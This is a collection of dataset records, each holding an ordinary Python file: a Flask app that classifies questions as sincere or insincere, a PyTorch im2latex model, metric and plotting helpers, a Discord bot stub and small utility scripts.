'some', 'such', 'only', 'own', 'same', 'so', 'than', 'too', 'very', \\\n 's', 't', 'can', 'will', 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm', 'o', 're', \\\n 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\", 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn',\\\n \"hadn't\", 'hasn', \"hasn't\", 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\\\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\", 'wasn', \"wasn't\", 'weren', \"weren't\", \\\n 'won', \"won't\", 'wouldn', \"wouldn't\"])\n\n\ndef clean_text(sentence):\n sentence = re.sub(r\"http\\S+\", \"\", sentence)\n sentence = BeautifulSoup(sentence, 'lxml').get_text()\n sentence = decontracted(sentence)\n sentence = re.sub(\"\\S*\\d\\S*\", \"\", sentence).strip()\n sentence = re.sub('[^A-Za-z]+', ' ', sentence)\n # https://gist.github.com/sebleier/554280\n sentence = ' '.join(e.lower() for e in sentence.split() if e.lower() not in stopwords)\n return sentence.strip()\n###################################################\ndef get_length(s):\n return len(s),np.array([len(s)])\n\ndef get_Words_Count(s):\n return len(s.split(\" \")),np.array([len(s.split(\" \"))])\n\ndef get_StopWords_Count(s):\n count=0\n for word in s.split(\" \"):\n if word in stopwords:\n count=count+1\n return count,np.array([count])\n\ndef get_UpperCase_Count(s):\n count=0\n for char in s:\n if ord(char)>=65 and ord(char)<=90:\n count=count+1\n return count,np.array([count])\n\ndef get_BadCount_Ratio(s):\n count=0\n bad_words = pd.read_csv('words_bad.txt', sep=\",\", header=None)\n words=bad_words.columns\n bad_words_arr=bad_words.iloc[0].tolist()\n final_bad_words=[]\n for word in bad_words_arr:\n word=word.strip() #Removing extra spaces from the words\n final_bad_words.append(word)\n for word in s.split(\" \"):\n if word in final_bad_words:\n count=count+1\n tot_words,tot=get_Words_Count(s)\n return count,np.array([count])\n\ndef get_Unique_Count(s):\n tot_words,tot=get_Words_Count(s)\n return len(set(s.split(\" \"))),np.array([len(set(s.split(\" \")))]),(len(set(s.split(\" \")))/tot_words)\n\ndef get_Punctuation_Count(s):\n count=0\n for ch in s:\n if ch in string.punctuation:\n count=count+1\n return count,np.array(count)\n\ndef get_Prediction(model,vectorizer):\n clf = pickle.load(open(model,'rb'))\n tfidf_vect = pickle.load(open(vectorizer,'rb'))\n to_predict_list = request.form.to_dict()\n review_text =(to_predict_list['question_text'])\n question=review_text\n length_t,length_text=get_length(review_text)\n tot_words,total_words=get_Words_Count(review_text)\n unique_count,unique_cnt,unique_cnt_ratio=get_Unique_Count(review_text)\n tot_stopwords,total_stopwords=get_StopWords_Count(review_text)\n upp_cnt,Uppercase_cnt=get_UpperCase_Count(review_text)\n punct_count,punct_cnt=get_Punctuation_Count(review_text)\n review_text = clean_text(to_predict_list['question_text'])\n tfidf_words=tfidf_vect.transform([review_text])\n bad_count,bad_cnt=get_BadCount_Ratio(review_text)\n bad_cnt_ratio=bad_count/tot_words\n punct_cnt=np.array([punct_cnt])\n data_m=hstack((tfidf_words,length_text,total_words,total_stopwords,Uppercase_cnt,bad_cnt_ratio,unique_cnt_ratio,punct_cnt,unique_cnt,bad_cnt)).tocsr()\n pred = clf.predict(data_m)\n print(pred[0])\n if pred[0]:\n prediction = \"InSincere Question\"\n else:\n prediction = \"Sincere Question\"\n word_list=review_text.split(\" \")\n data_dict={}\n data_dict['Length']=length_t\n data_dict['Total Words']=tot_words\n data_dict['Total StopWords']=tot_stopwords\n data_dict['Uppercase Count']=upp_cnt\n data_dict['BadWords Count']=bad_count\n data_dict['BadWords ratio']=bad_cnt_ratio\n data_dict['Punctuations Count']=punct_count\n data_dict['Unique Words Count']=unique_count\n data_dict['Unique Words Ratio']=unique_cnt_ratio\n if vectorizer == \"tfidf_vec.p\":\n tfidf_features=tfidf_vect.get_feature_names()\n tfidf_idf_=tfidf_vect.idf_\n word_zip=dict(zip(tfidf_features,tfidf_idf_))\n print(\"In TFIDF\")\n for word in word_list:\n print(\"In For\")\n if word in word_zip.keys():\n data_dict[word]=word_zip[word]\n data_dict['Question']=question\n data_dict['Prediction']=prediction\n return data_dict\n\n@app.route('/') #route() function is a decorator which tells the web Application which URL should call the associated\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/data_analysis')\ndef data_analyze():\n return render_template('data_analysis.html')\n\n@app.route('/index')\ndef index():\n return flask.render_template('Testing_f.html')\n\n@app.route('/compare')\ndef compare():\n return render_template('compare.html')\n\n@app.route('/view_dataset')\ndef read_dataset():\n df=pd.read_csv('sample_train.csv')\n return render_template('view_dataset.html',data_view=df)\n\n@app.route('/model_info')\ndef model_info():\n return render_template('model_info.html')\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n algo_selected=request.form['group1']\n text_vectorizer=request.form['group2']\n print(algo_selected)\n model_data={}\n if algo_selected==\"Naive Bayes\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('best_nb_tfidf.p','tfidf_vec.p')\n elif algo_selected==\"Logistic Regression\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('model_lr_f_best.p','tfidf_vec.p') \n elif algo_selected==\"Naive Bayes\" and text_vectorizer==\"BagOfWords\":\n data=get_Prediction('model_nb_count_best.p','count_vec.p')\n elif algo_selected==\"SVM\" and text_vectorizer ==\"BagOfWords\":\n data=get_Prediction('model_sv_f.p','count_vec.p')\n elif algo_selected==\"SVM\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('model_sv_f.p','tfidf_vec.p')\n else:\n data=get_Prediction('model_lr_best_count.p','count_vec.p')\n return render_template('prediction.html',result=data)\n\n@app.route('/predict_2', methods=['POST'])\ndef predict_2():\n if request.method == 'POST':\n print(\"HELLo\")\n algo_selected=request.form['group1']\n vec1=request.form.getlist('BOW')\n vec2=request.form.getlist('TFIDF')\n print(algo_selected)\n if algo_selected ==\"Naive Bayes\":\n data_tfidf=get_Prediction('best_nb_tfidf.p','tfidf_vec.p')\n data_cnt=get_Prediction('best_nb_tfidf.p','count_vec.p')\n data_tfidf['Text Vectorizer']='TFIDF'\n data_tfidf['alpha']=1\n data_tfidf['fit_params']='None'\n data_tfidf['scoring']='f1'\n data_tfidf['fit_prior']='true'\n data_tfidf['iid']='true'\n\n data_cnt['Text Vectorizer']='BOW'\n data_cnt['alpha']=1\n data_cnt['fit_params']='None'\n data_cnt['scoring']='f1'\n data_cnt['fit_prior']='true'\n data_cnt['iid']='true'\n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n elif algo_selected == \"Logistic Regression\":\n data_tfidf=get_Prediction('model_lr_f_best.p','tfidf_vec.p')\n data_cnt=get_Prediction('model_lr_best_count.p','count_vec.p')\n data_tfidf['alpha']='0.00001'\n data_tfidf['loss']='log'\n data_tfidf['class_weight']='balanced'\n data_tfidf['epsilon']=0.1\n data_tfidf['learning_rate']='optimal'\n data_tfidf['penalty']='l2'\n data_tfidf['fit_intercept']='True'\n data_tfidf['Text vectorizer']='TFIDF'\n\n data_cnt['Text Vectorizer']='BOW'\n data_cnt['alpha']='0.00001'\n data_cnt['loss']='log'\n data_cnt['class_weight']='balanced'\n data_cnt['epsilon']=0.01\n data_cnt['learning_rate']='optimal'\n data_cnt['penalty']='l1'\n data_cnt['fit_intercept']='True'\n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n else:\n data_cnt=get_Prediction('model_sv_f.p','count_vec.p')\n data_tfdif=get_Prediction('model_sv_f.p','count_vec.p')\n data_tfidf['alpha']='0.0001'\n data_tfidf['loss']='hinge'\n data_tfidf['class_weight']='balanced'\n data_tfidf['epsilon']=0.1\n data_tfidf['learning_rate']='optimal'\n data_tfidf['penalty']='l2'\n data_tfidf['fit_intercept']='True'\n data_tfidf['Text vectorizer']='TFIDF'\n\n data_cnt['alpha']='0.0001'\n data_cnt['loss']='hinge'\n data_cnt['class_weight']='balanced'\n data_cnt['epsilon']=0.01\n data_cnt['learning_rate']='optimal'\n data_cnt['penalty']='l1'\n data_cnt['fit_intercept']='True'\n data_cnt['Text Vectorizer']='BOW' \n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"556165981","text":"import sys\n# we would like to be in the src directory to have access to main files\nsys.path.append(\"..\")\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch.distributions.uniform import Uniform\nimport numpy as np\n\nclass im2latex(nn.Module):\n r\"\"\" Create the image to latex converter model.\n\n # Arguments\n\n encoder_lstm_units: The dimensionality of the output space for encoder LSTM layers\n decoder_lstm_units: The dimensionality of the output space for decoder LSTM layers\n vocab_list: The array of possible outputs of the language model\n embedding_size: The max length of the equation\n\n\n # Example\n\n .. code:: python\n latex_model = im2latx(encoder_lstm_units, decoder_lstm_units, vocab_list)\n\n model = latex_model.model\n \"\"\"\n\n def __init__(self,\n vocab_size,\n dropout=0.2,\n encoder_lstm_units=256,\n decoder_lstm_units=256,\n embedding_size=64):\n super(im2latex, self).__init__()\n self.name = 'im2latex'\n self.encoder_lstm_units = encoder_lstm_units\n self.decoder_lstm_units = decoder_lstm_units\n self.embedding_size = embedding_size\n self.vocab_size = vocab_size\n\n # encoder\n self.cnn_encoder = nn.Sequential(\n nn.Conv2d(1, 32, 3, 1),\n #nn.BatchNorm2d(num_features=64),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(32, 64, 3, 1),\n #nn.BatchNorm2d(num_features=128),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(64, 128, 3, 1),\n #nn.BatchNorm2d(num_features=256),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n # nn.Conv2d(128, 256, 3, 1),\n # #nn.BatchNorm2d(num_features=256),\n # nn.ReLU(),\n # nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(128, self.encoder_lstm_units, 3, 1, 0),\n #nn.BatchNorm2d(num_features=self.encoder_lstm_units),\n nn.ReLU()\n )\n\n # token_decoder/encoder\n self.rnn_decoder = nn.LSTMCell(self.decoder_lstm_units+self.embedding_size, self.decoder_lstm_units)\n self.embedding = nn.Embedding(self.vocab_size, self.embedding_size)\n\n self.init_wh = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n self.init_wc = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n self.init_wo = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n\n # attention\n self.beta = nn.Parameter(torch.Tensor(self.encoder_lstm_units))\n init.uniform_(self.beta, -1e-2, 1e-2)\n self.W_1 = nn.Linear(self.encoder_lstm_units, self.encoder_lstm_units, bias=False)\n self.W_2 = nn.Linear(self.decoder_lstm_units, self.encoder_lstm_units, bias=False)\n\n self.W_3 = nn.Linear(self.decoder_lstm_units+self.encoder_lstm_units, self.decoder_lstm_units, bias=False)\n self.W_out = nn.Linear(self.decoder_lstm_units, self.vocab_size, bias=False)\n\n self.dropout = nn.Dropout(p=dropout)\n self.uniform = Uniform(0, 1)\n \n def encode(self, imgs):\n encoded_imgs = self.cnn_encoder(imgs) # [Batchs, encoder_units, H', W']\n encoded_imgs = encoded_imgs.permute(0, 2, 3, 1) # [Batchs, H', W', encoder_units]\n B, H, W, _ = encoded_imgs.shape\n encoded_imgs = encoded_imgs.contiguous().view(B, H*W, -1) # [Batchs, H' x W', encoder_units]\n if True:\n encoded_imgs = self.add_pos_enc(encoded_imgs)\n return encoded_imgs\n \n def add_pos_enc(self, tensor, min_t=1, max_t=1e4):\n \"\"\"\n Implements the frequency-based positional encoding described\n in `Attention is all you Need\n Parameters\n ----------\n tensor : ``torch.Tensor``\n a Tensor with shape (batch_size, timesteps, hidden_dim).\n min_timescale : ``float``, optional (default = 1.0)\n The largest timescale to use.\n Returns\n -------\n The input tensor augmented with the sinusoidal frequencies.\n \"\"\"\n\n _, t_steps, hidden_dim = tensor.size()\n tst_range = torch.arange(0, t_steps, dtype=torch.long, device=tensor.device).data.float() # (t_steps)\n # half for both sin and cos\n n_tsc = hidden_dim//2\n tsc_range = torch.arange(0, n_tsc, dtype=torch.long, device=tensor.device).data.float() # (n_tsc)\n\n log_tsc_inc = np.log(max_t / min_t) / (n_tsc - 1) \n inv_tsc = min_t * torch.exp(tsc_range * -log_tsc_inc) # (n_tsc)\n\n scaled_time = tst_range.unsqueeze(1) * inv_tsc.unsqueeze(0) #(t_steps, n_tsc)\n sinusoids = torch.randn(scaled_time.size(0), 2*scaled_time.size(1), device=tensor.device) # (t_steps, 2 * n_tsc)\n sinusoids[:, ::2] = torch.sin(scaled_time) # even steps\n sinusoids[:, 1::2] = torch.cos(scaled_time) # odd steps\n if hidden_dim % 2 != 0:\n # if the number of dimensions is odd, the cos and sin\n # timescales had size (hidden_dim - 1) / 2, so we need\n # to add a row of zeros to make up the difference.\n sinusoids = torch.cat([sinusoids, sinusoids.new_zeros(timesteps, 1)], 1)\n\n return tensor + sinusoids.unsqueeze(0)\n \n def init_decoder(self, enc_out):\n \"\"\"args:\n enc_out: the output of row encoder [B, H*W, C]\n return:\n h_0, c_0: h_0 and c_0's shape: [B, dec_units]\n init_O : the average of enc_out [B, dec_units]\n for decoder\n \"\"\"\n mean_enc_out = enc_out.mean(dim=1)\n h = self._init_h(mean_enc_out)\n c = self._init_c(mean_enc_out)\n init_o = self._init_o(mean_enc_out)\n return (h, c), init_o\n\n def _init_h(self, mean_enc_out):\n return torch.tanh(self.init_wh(mean_enc_out))\n\n def _init_c(self, mean_enc_out):\n return torch.tanh(self.init_wc(mean_enc_out))\n\n def _init_o(self, mean_enc_out):\n return torch.tanh(self.init_wo(mean_enc_out))\n \n def _get_attn(self, encoder_output, h_t):\n \"\"\"Attention mechanism\n args:\n encoder_output: row encoder's output [B, L=H*W, C]\n h_t: the current time step hidden state [B, dec_units]\n return:\n context: this time step context [B, C]\n attn_scores: Attention scores\n \"\"\"\n # cal alpha\n alpha = torch.tanh(self.W_1(encoder_output)+self.W_2(h_t).unsqueeze(1))\n alpha = torch.sum(self.beta*alpha, dim=-1) # [B, L]\n alpha = F.softmax(alpha, dim=-1) # [B, L]\n\n # cal context: [B, C]\n # multiply the weights of each batch with the encoded img\n context = torch.bmm(alpha.unsqueeze(1), encoder_output)\n context = context.squeeze(1)\n return context, alpha\n \n def step_decoding(self, hidden_states, output_t, encoder_output, target):\n \"\"\"Runing one step decoding\"\"\"\n\n prev_y = self.embedding(target).squeeze(1) # [B, emb_size]\n inp = torch.cat([prev_y, output_t], dim=1) # [B, emb_size+dec_rnn_h]\n h_t, c_t = self.rnn_decoder(inp, hidden_states) # h_t:[B, dec_rnn_h]\n h_t = self.dropout(h_t)\n c_t = self.dropout(c_t)\n\n # context_t : [B, C]\n context_t, attn_scores = self._get_attn(encoder_output, h_t)\n\n # [B, dec_rnn_h]\n output_t = self.W_3(torch.cat([h_t, context_t], dim=1)).tanh()\n output_t = self.dropout(output_t)\n\n # calculate logit\n logit = F.softmax(self.W_out(output_t), dim=1) # [B, out_size]\n\n return (h_t, c_t), output_t, logit, attn_scores\n \n def forward(self, imgs, formulas, epsilon=1.):\n \"\"\"args:\n imgs: [B, C, H, W]\n formulas: [B, MAX_LEN]\n epsilon: probability of the current time step to\n use the true previous token\n return:\n logits: [B, MAX_LEN, VOCAB_SIZE]\n \"\"\"\n # encoding\n encoded_imgs = self.encode(imgs) # [B, H*W, 512]\n # init decoder's states\n dec_states, o_t = self.init_decoder(encoded_imgs)\n max_len = formulas.size(1)\n logits = []\n append_output = logits.append\n attention = []\n for t in range(max_len):\n target = formulas[:, t:t+1]\n # schedule sampling\n if logits and self.uniform.sample().item() > epsilon:\n target = torch.argmax(logits[-1], dim=1, keepdim=True)\n # ont step decoding\n dec_states, o_t, logit, attn_scores = self.step_decoding(\n dec_states, o_t, encoded_imgs, target)\n append_output(logit)\n #attention.append(attn_scores)\n logits = torch.stack(logits, dim=1) # [B, MAX_LEN, out_size]\n return logits #, attention\n","sub_path":"src/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322301349","text":"import logging\n\ndef downsample(zone, downsample_factor=1000):\n # downsample if > downsample_factor points\n if len(zone) > downsample_factor:\n downsample = int(len(zone) / downsample_factor)\n logging.debug(f\"Downsampling by a factor of {downsample}\")\n downsampled = zone[::downsample]\n else:\n return zone\n\n # ensure that the first and last points are present\n if zone[0] != downsampled[0]:\n downsampled.insert(0, zone[0])\n if zone[-1] != downsampled[-1]:\n downsampled.append(zone[-1])\n\n return downsampled\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"52842476","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef validate_accuracy(y_true: list, y_pred: list) -> float:\n \"\"\" calculates the accuracy of predictions\n \n :param list y_true: targets\n :param list y_pred: predictions\n :return float: accuracy\n \"\"\"\n\n correct_in_batch = 0\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n \n if target == output:\n correct_in_batch += 1\n \n return round((100 * correct_in_batch / len(y_true)), 5)\n\n\ndef create_confusion_matrix(y_true: list, y_pred: list, classes: list=None, save: str=None) -> None:\n \"\"\" creates and plots a confusion matrix given two list (targets and predictions)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param list classes: list of class names\n \"\"\"\n\n amount_classes = len(classes)\n\n confusion_matrix = np.zeros((amount_classes, amount_classes))\n for idx in range(len(y_true)):\n target = y_true[idx]\n output = y_pred[idx]\n\n confusion_matrix[target][output] += 1\n\n fig, ax = plt.subplots(1)\n\n ax.matshow(confusion_matrix)\n ax.set_xticks(np.arange(len(classes)))\n ax.set_yticks(np.arange(len(classes)))\n\n ax.set_xticklabels(classes)\n ax.set_yticklabels(classes)\n\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"left\", rotation_mode=\"anchor\")\n plt.setp(ax.get_yticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n if save != None:\n try:\n plt.savefig(save + \"/confusion_matrix.png\")\n except Exception as e:\n print(\"\\ncouldn't save confusion matrix!\")\n print(e)\n\n plt.show()\n\n\ndef true_positive_rate(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates the true positive rate of every class\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param list classes: list of class names\n \"\"\"\n\n true_positive_list = [0 for _ in range(classes)]\n total_class_count_list = [0 for _ in range(classes)]\n\n for idx in range(len(y_true)):\n target = y_true[idx]\n output = y_pred[idx]\n\n if target == output:\n true_positive_list[target] += 1\n\n total_class_count_list[target] += 1\n\n return [true_positive_list[i] / total_class_count_list[i] for i in range(classes)]\n\n\ndef precision(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates recall scores of classes (against all other classes)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param int classes: amount of classes\n :return list: list of the precision scores of each class\n \"\"\"\n\n total_prediction_of_classes, total_true_prediction_of_classes = [0 for i in range(classes)], [0 for i in range(classes)]\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n\n for class_ in range(classes):\n if output == class_:\n total_prediction_of_classes[class_] += 1\n\n if output == target:\n total_true_prediction_of_classes[class_] += 1\n\n all_precisions = [0 for i in range(classes)]\n for i in range(classes):\n if total_prediction_of_classes[i] > 0:\n all_precisions[i] = round((total_true_prediction_of_classes[i] / total_prediction_of_classes[i]), 5)\n else:\n all_precisions[i] = 0\n\n return all_precisions\n\n\ndef recall(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates recall scores of all classes (against all other classes)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param int classes: amount of classes\n :return list: list of the recall scores of each class\n \"\"\"\n\n total_prediction_of_classes, total_true_of_classes = [0 for i in range(classes)], [0 for i in range(classes)]\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n\n for class_ in range(classes):\n if target == class_:\n total_true_of_classes[class_] += 1\n\n if output == class_:\n total_prediction_of_classes[class_] += 1\n\n all_recalls = [0 for i in range(classes)]\n for i in range(classes):\n if total_true_of_classes[i] > 0:\n all_recalls[i] = round((total_prediction_of_classes[i] / total_true_of_classes[i]), 5)\n else:\n all_recalls[i] = 0\n\n return all_recalls\n\n\ndef f1_score(precisions: list, recalls: list) -> list:\n \"\"\" calculates F1 scores of all classes (against all other classes)\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :return list: list of the F1 score of each class\n \"\"\"\n \n f1_scores = []\n for i in range(len(precisions)):\n precision_score, recall_score = precisions[i], recalls[i]\n\n try:\n f1_score = round((2 * ((precision_score * recall_score) / (precision_score + recall_score))), 5)\n except:\n f1_score = 0\n\n f1_scores.append(f1_score)\n\n return f1_scores\n\n\ndef score_plot(precisions: list, recalls: list, f1_scores: list, classes: dict={}, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n\n fig, axs = plt.subplots(1, 3)\n\n axs[0].bar(classes, precisions, color=\"steelblue\", alpha=0.9)\n axs[0].set_xticklabels(classes, rotation=75)\n axs[0].title.set_text(\"precision scores\")\n\n axs[1].bar(classes, recalls, color=\"orange\", alpha=0.85)\n axs[1].set_xticklabels(classes, rotation=75)\n axs[1].title.set_text(\"recall scores\")\n\n axs[2].bar(classes, f1_scores, color=\"forestgreen\", alpha=0.85)\n axs[2].set_xticklabels(classes, rotation=75)\n axs[2].title.set_text(\"f1 scores\")\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\ndef plot_true_positive_rates(true_positive_rates: list, classes: dict=None, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n\n plt.bar(classes, true_positive_rates, color=\"lightslategray\", alpha=0.9, align=\"center\")\n plt.xticks(classes, rotation=50)\n # plt.xticklabels(classes, rotation=25)\n plt.title(\"true positive scores\")\n\n \"\"\"fig, axs = plt.subplots(1, 2)\n \n axs[0].bar(classes, true_positive_rates, color=\"lightslategray\", alpha=0.9, align=\"center\")\n axs[0].set_xticklabels(classes, rotation=75)\n axs[0].title.set_text(\"true positive scores\")\n\n axs[1].bar(classes, [np.mean(true_positive_rates) for _ in range(len(classes))], color=\"lightslategray\", alpha=0.9, align=\"center\")\n axs[1].set_xticklabels(classes, rotation=75)\n axs[1].title.set_text(\"desired true positive scores\")\n axs[1].set_ylim([0, 1.0])\"\"\"\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\ndef plot_weight_influence(pre_true_positive_rates: list, post_true_positive_rates: list, classes: dict=None, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n \n nrange = np.arange(len(classes))\n width = 0.35\n\n\n plt.bar(nrange - width, pre_true_positive_rates, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n plt.bar(nrange, post_true_positive_rates, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n plt.xticks(nrange, classes, rotation=25)\n # plt.xticklabels(classes, rotation=25)\n plt.title(\"true positive scores\")\n\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\n\"\"\"classes = {\"airplane\": 0, \"automobile\": 1, \"bird\": 2, \"cat\": 3, \"deer\": 4, \"dog\": 5, \"frog\": 6, \"horse\": 7, \"ship\": 8, \"truck\": 9}\ntrue_positive_rates = [0.8363273453093812, 0.9284294234592445, 0.7088846880907372, 0.6540755467196819, 0.7793522267206477, 0.7243589743589743, 0.8722943722943723, 0.8511066398390342, 0.854043392504931, 0.8899253731343284]\nplot_true_positive_rates(true_positive_rates, classes=list(classes.keys()))\"\"\"\n\n\n\n\n\n\"\"\"def plot_weight_influence(pre_scores: list, post_scores: list, classes: dict=None, save: str=None) -> None:\n\n pre_precisions, pre_recalls, pre_f1_scores = pre_scores\n post_precisions, post_recalls, post_f1_scores = post_scores\n\n plt.style.use(\"bmh\")\n\n fig, axs = plt.subplots(1, 3)\n \n nrange = np.arange(len(classes))\n width = 0.35\n\n\n axs[0].bar(nrange, pre_precisions, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[0].bar(nrange - width, post_precisions, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[0].set_xticks(nrange)\n axs[0].set_xticklabels(classes, rotation=25)\n axs[0].title.set_text(\"precision scores\")\n\n\n axs[1].bar(nrange, pre_recalls, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[1].bar(nrange - width, post_recalls, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[1].set_xticks(nrange)\n axs[1].set_xticklabels(classes, rotation=25)\n axs[1].title.set_text(\"recall scores\")\n\n axs[2].bar(nrange, pre_f1_scores, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[2].bar(nrange - width, post_f1_scores, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[2].set_xticks(nrange)\n axs[2].set_xticklabels(classes, rotation=25)\n axs[2].title.set_text(\"f1 scores\")\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\"\"\"","sub_path":"experiments/cnn-experiment/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"621627322","text":"from flask import Flask, render_template\r\nimport requestlaporan\r\n\r\n\r\napp = Flask(__name__, static_folder='app/static')\r\napp.static_folder = 'static'\r\n\r\n@app.route('/requestbaru')\r\ndef request():\r\n \r\n return render_template('requestLaporan.html')\r\n laporan = requestlaporan.RequestLaporan()\r\n\r\n\r\n\r\n\r\n #laporan.validasiSession()\r\n #hasil = laporan.requestLaporanBaru(.......................)\r\n\r\n\r\n#app.route('editlaporan'):\r\n# ........\r\n# .......\r\n# .......\r\n","sub_path":"app/TEST/msrequest.py","file_name":"msrequest.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"611565166","text":"#Imports\nimport discord\nfrom discord.ext import commands\nimport jeux\nimport asyncio\nimport configparser\n\n#Config file\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nbot_key = config.get(\"Bot\", \"key\") #bot's key\npcmd = config.get(\"Bot\", \"Command_Prefix\") #command s'Prefix\n\n#bot client\nClient = commands.Bot(command_prefix=pcmd) \nClient.remove_command('help')\n\n@Client.event\nasync def on_ready():\n print(\"Starting Bot!\")\n print(\"Bot Id = \" + Client.user.id)\n\n@Client.command()\nasync def ping():\n await Client.say(\"Pong!\")\n\n@Client.command()\nasync def help():\n await Client.say(\"Bot en Construction!\")\n\nClient.run(bot_key)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"429558538","text":"L = float(input('L ni kiriting : '))\n\nP = 3.14\n# R = aylananing radiusi L = 2 * P * R\nR = L / (2 * P)\n# S = ayalananing yuzasi\nS = P * (R **2)\n\nprint(R)\nprint(S)","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
